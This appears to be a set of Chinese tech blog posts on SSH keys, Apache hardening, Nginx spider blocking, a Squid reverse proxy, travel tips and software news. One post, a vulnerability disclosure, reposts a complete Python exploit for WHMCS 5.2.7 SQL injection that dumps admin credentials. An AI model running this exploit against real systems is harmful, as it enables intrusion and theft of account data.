免密码信任关系登陆使用ssh 当服务器太多的时候，当密码太多的时候，当需要做rsync的时候，当经常scp的时候常常要输入各密码造成各种混乱有时候还会被列入hosts.deny这个时候用凭证登陆就方便了。1.连接发起方(客户端)使用ssh-keygen -t rsa生成授权钥匙 2.将生成id_rsa.pub的内容复制到/root/.ssh/authorized_keys（如果涉及到权限问题则使用chmod 644 /root/.ssh/authorized_keys授予一下） 简单一句话阐述：生成一个钥匙放上去就可以免密码登陆了。

招行全币种VISA白金卡到手 两个月前看到可以申请一直没下手，前段时间闲得蛋疼跑招行提交了申请第二天银行就批了然后就立即给我挂号信过来了，卡片上没有银联的标志果然爽多了。 据官方说是在国内可能会无法刷卡建议出国刷卡，免中间兑换汇率和手续费，免年费。 接下来找个时间把招行的和卡卡擦掉。bin码信息Bin:451461 Card Brand: VISA Issuing Bank: CHINA MERCHANTS BANK Card Type: CREDIT Card Level: PLATINUM/SINGATURE Iso Country Name: CHINA Iso Country A2: CN Iso Country A3: CHN Iso Country Number: 156 Bank's website: www.cmbchina.com官方申请地址：http://market.cmbchina.com/ccard/quanbika/

Mac OS X Mavericks正式版发布 免费开放下载 10月23日消息，苹果在其秋季产品发布会上正式发布了Mac OS X Mavericks正式版，并宣布从即日起对公众免费开放下载。新版OS X能够使电池更高效，新款的MacBook Air可以增加1小时的网页浏览时间，播放视频时间提升90分钟。同时，新的Compressed Memory 技术能有效调用内存，能把6GB的数据压缩进4GB的内存中。新的显示平台支持OpenCL，相比之前可以增加0.8倍的速度。新版OS X中，iPhoto, Pages, Numbers, Keynote，地图app，iBookstore等套件都进行了更新，用户可以将iBooks的内容拖动到Pages便可完成复制操作。新版地图软件很像iOS上的地图，地图和路线都可以在PC与iPhone之间共享。官方地址：http://www.apple.com/cn/osx/ 登陆APP store后直接可以下载进行升级。

隐藏apache的版本信息 apache的http header和错误页面或多或少的会透露一些软件和系统的版本信息，对于生产服务来说这些东西是毫无用处的并且还有可能会被人利用分析.#curl -I 127.0.0.1 HTTP/1.1 200 OK Date: Sun, 13 Oct 2013 13:03:18 GMT Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips DAV/2 Last-Modified: Wed, 14 Nov 2012 07:16:01 GMT X-Powered-By: PHP/5.3.24 ETag: "32006-10-4ce6f4e86ee40" Accept-Ranges: bytes Content-Length: 16 Content-Type: text/html通过修改apache的配置可以不显示它们cat >>/etc/httpd/conf/httpd.conf<<EOF ServerTokens ProductOnly ServerSignature Off EOFServerTokens缺省值OS名称，ServerSignature缺省值是apache的版本号。 解决了apache的问题顺道干掉php版本的输出显示sed -i 's#expose_php = On#expose_php = Off#' /etc/php.iniexpose_php默认值是On将其关闭http header就不会输出php版本了。 调整完参数重启httpd就生效了。调整参数生效后的http header信息curl -I 127.0.0.1 HTTP/1.1 200 OK Date: Sun, 13 Oct 2013 13:28:25 GMT Server: Apache Last-Modified: Wed, 14 Nov 2012 07:16:01 GMT ETag: "32006-10-4ce6f4e86ee40" Accept-Ranges: bytes Content-Length: 16 Content-Type: text/htmlPS:以上apache和php的配置文件均为常规配置路径，如果您是自定义安装请注意更换路径。

全球主要手势意义图解 假使您去一个国家旅行，偏偏不懂那个国家的语言，而您也没时间拿起一本词典学习日常用语。因此您到处逛的时候，不得不使用手势与当地人沟通。在饭店里，您试着通过点头和竖大拇指告诉服务生您想要哪道菜，可您得到的却是完全相反的食物以及服务生生气不解的表情。没人愿意直视您的眼睛，而且当您用手指指向地图上您想去的地方时，对方明显摆出一副被您侮辱的神情。这究竟是怎么一回事？手势在不同地方代表不同的涵义。 您可能认为全世界的非语言沟通都是通用的，实际上恰恰相反，不同的文化在理解诸如身体语言、手势、姿势、举止、声音（如尖叫和咕哝）以及眼神接触程度时，都是不同的。在上述的例子中，那个无辜的旅行者以为点头代表“是的”，但在一些国家，点头却表示“否定”。在中东，将头向下低代表认可，但将头抬起则表示否定；在日本，一个人抬头、低头的动作可能仅仅表示他正在倾听。在伊朗，竖大拇指的动作是非常粗俗的。用拇指和食指做出环形表示OK的方式，在一些国家则表示金钱，在另一些国家，用错误的手指指向别人的身体，将被视为非常严重的冒犯行为，您将有惹怒别人的风险。在一些国家，眼神接触代表尊重，而另一些地方，您想表示尊重则必须避免接触对方的眼神。我们不可能列出所有这些差异。一些国家认为握手是粗鲁无礼的行为，在中东，用左手递东西给别人是很不礼貌的——毕竟，这只手负责处理个人卫生。在美国，饭后打嗝会被别人认为缺乏教养，但在印度，一个饱满的嗝声则是对厨师厨艺的赞赏。在一些地方，人们重视交谈时保持个人空间，但从中东来的人，和您说话时则几乎将脸贴到了您的面前。在拉丁美洲，您将受到别人非常自然随意的接触，不论是朋友还是陌生人——您甚至有可能受到别人非常热情的拥抱——不过在美国，这种行为很有可能被视为性骚扰。在亚洲，您千万要抑制想拍一个小孩头的冲动，因为亚洲人认为陌生人拍头并不礼貌。面部表情大概是唯一一种可被视为全球通用的非语言交流形式啦。查尔斯•达尔文第一个提出所有文化中的人类共享同样的面部表情，1960年代这个假使被科学实验所证实。科学家确定了6种全球通用的面部表情：愤怒、厌恶、恐惧、高兴、伤心以及惊奇。近些年来，另一些科学家提出，表示轻蔑以及尴尬的表情也是全球通用的。不论您在哪里，切记，您的身体总在说些什么，即便您没有开口说话。积极意义的手势： ……不要问我为什么，我也不明白“绿帽子”算哪门子“积极意义”。或许是对不幸中招者的积极鼓励？消极意义手势：所以看见法国人对你着你狂抹脖子不要急着报警，他也许只是小气…… 中性意义手势：大约是说：“哇！美女！！剜瞎我的狗眼吧！！！”这样的……很容易误认为是在勾引诱惑吧…… 不得不承认，在数数字上，国产手势表现出了强大的优势，可以空出一只手挠挠头皮卖个萌什么的。分歧意义的手势： 希腊帅哥对你做这个手势时不要心花怒放，他只是在说：你够了！ 手心朝外时的手势也是经典的“兰花指”的近亲…表示“我有点娘”… 知道了吧，趁人拍照的时候把“2”手势偷偷地高级过头并不是件很萌的事情，这么做甚至是不太吉利的！ 原文链接：http://xinxisheji.tuyansuo.com/info/1048.html

世界电压以及插头标准 如果要出国旅游学习的话建议了解下世界各地的用电标准，以免出现《泰囧》里面徐峥在酒店想用电脑的时候发现插座对不上的情况。 电压方面 北美 中美洲和日本以及沙特阿拉伯和部分地方采用110-120V电压，其他基本都是220-240V电压，另外还有就50Mhz和60Mhz的频率差别。插座类型统计表亚太和欧美电压统计表 全球电压统计分布图全球插座类型统计分布图

Google Webdesigner for mac 无意间看到了Gooogle webdesigner这个东东，并且丫的还支持OS X。据说是为推动Adwords广告主使用新技术而开发的,目前不能打开非Google Web Designer创建的HTML文件，还需要完善。 附上下载连接地址：https://dl.google.com/webdesigner/mac/shell/googlewebdesigner_mac.dmg

Nginx 屏蔽搜索引擎蜘蛛 将代码加入不让蜘蛛抓取的段内if ($http_user_agent ~* (baiduspider|googlebot|soso|bing|sogou|yahoo|sohu-search|yodao|YoudaoBot|robozilla|msnbot|MJ12bot|NHN|Twiceler)){ return 403; }放入server段内则全站生效，放在location则只有对应的段生效对其他独立的location段无影响.

Whmcs 5.2.7爆SQL注入漏洞 localhost.re大牛在爆solusvm漏洞后沉寂了几个月又爆出了whmcs的SQL注入漏洞。 每篇文章还是依旧带一张搞笑得gif图片 漏洞文件 /includes/dbfunctions.php:<?php function update_query($table, $array, $where) { #[...] if (substr($value, 0, 11) == 'AES_ENCRYPT') { $query .= $value.','; continue; } #[...] $result = mysql_query($query, $whmcsmysql); } ?>另外还附带了Python的EXP#!/usr/bin/env python # 2013/10/03 - WHMCS 5.2.7 SQL Injection # http://localhost.re/p/whmcs-527-vulnerabilityurl = 'http://clients.target.com/' # wopsie dopsie user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php user_pwd = 'hacker'import urllib, re, sys from urllib2 import Request, urlopen ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"def exploit(sql): print "Doing stuff: %s" % sql r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read() return re.search(r'(id="firstname" value="(.*?)")', r).group(2)def login(): print "Getting CSRF token" r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua})) csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2) cookie = r.info()['set-cookie'].split(';')[0] print "Logging in" r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read() if 'dologin.php' in r: sys.exit('Unable to login') else: return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]user = login() print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients# oh you want to be evil #exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)原文地址：http://localhost.re/p/whmcs-527-vulnerability

利用廉价VPS做反代,保护你的真实服务器 BUYVM有新机器上架，正好碰上。所以拿群里朋友“杰克”的新VPS做样板。说一下反代的做法。做反代的好处是可以不暴露你的真实服务器，就算有DCMA之类的，也有个缓冲余地。因为只是个接口而已。但是反代的主要目的是用来负载均衡和加速网页用的。不要只认为反代就是防别人投诉的。现在开始。一切以BUYVM的Debian VPS做样板。第一步，需要远程连上你的服务器。linux VPS，大多数都是无UI界面的。也不需要UI界面。LINUX系的VPS，远程有2个方法：VNC，SSH。  前者相当于WIN主机的3389，后者相当于WIN的TELNET也就是DOS模式。有的服务器是已经安装好了SSH服务的，也有的服务器是没有安装好的。如果没有安装好，那么VPS服务商的后台管理面版里，一般会有一个  "Console" 的按纽，让你可以用JAVA版的软件直接连进去。你可以通过这个接口安装SSH。apt-get updateapt-get install SSH安装好以后，可以使用 "Bitvise SSH Client"或者其它SSH 客户端远程 进去。我个人比较习惯用 Bitvise,可自行google下载。界面很简单，填入HOST也就是你VPS的IP， 和password,也就是你的ROOT密码。 login登录进去就行了。这时候就已经连上。左边有一行菜单，用到的有2个：  一是 "New terminal console",二是 "New SFTP window",前者是远程控制台，后者是FTP用来传文件。第二步，检查是不是已经有安装了APACHE等软件。这个要干掉。泥巴，It works!!!! 这VPS已经自动安装了 apache.我要干掉它。因为我将要使用squid。并不是在这台机器上放网站。使用命令: apt-get autoremove apache2 apache2.2-common果断YES啊。reboot 一下。。果然干掉了。第三步，安装SQUID这个还是照样使用命令。超简单。运行: apt-get install squid问你是不是继续，当然。需要几秒钟下载。然后即完成：第四步，配置SQUID需要使用FTP那个功能。打开远程服务器的SQUID配置文件并修改这个界面中，左边是你本地的目录和文件，右边是VPS上的目录和文件。SQUID的默认配置文件在  /etc/squid 目录中，拖到左边。下载下来，用文本编辑器处理编辑就可以了。好像有些复杂。。。。。我们简单些。全清掉。换上下面的配置：visible_hostname Mr9Site http_port 80 accel vhost vport cache_peer 220.220.220.220 parent 80 0 no-query originserver name=Mr9Default acl all src 0.0.0.0/0.0.0.0 no_cache allow allhttp_access allow all cache_mem 90 MB maximum_object_size 320010 KB maximum_object_size_in_memory 100 KB cache_dir ufs /var/spool/squid 10000 32 512 我做了2处标志。 第一个Mr9Site只是个服务器名称。你可以随便写点英文。但不要有空格。比如说 abc.abc.com，或者说 myvps1 这样子的。第2个标志，也就是那个 220.220.220.220 这个IP地址。是你的真实服务器的IP地址。 cache_mem是内存cache的大小，一般设置的比你的VPS内存小一些就行了。在这里，因为VPS是128M内存的，所以我设置了90M。上传覆盖掉VPS服务器上的那个配置文件。然后返回SSH控制台，运行这三个命令：squid -k killsquid -zsquid分别是：停止SQUID，初使化SQUID，开启SQUID。到此，安装成功。  这时候，任何指向你这个反代IP的请求，都会转发到你的真实服务器上去。所以你的新域名，只要解到这个新的反代服务器就OK了。这里没有用到加速功能。请自行度娘：squid 图片加速，HTML加速等等。转载自：http://www.dazhou.net/HowTo/liyonglianjiaVPSzuofandaibaohunidezhenshifuwuqi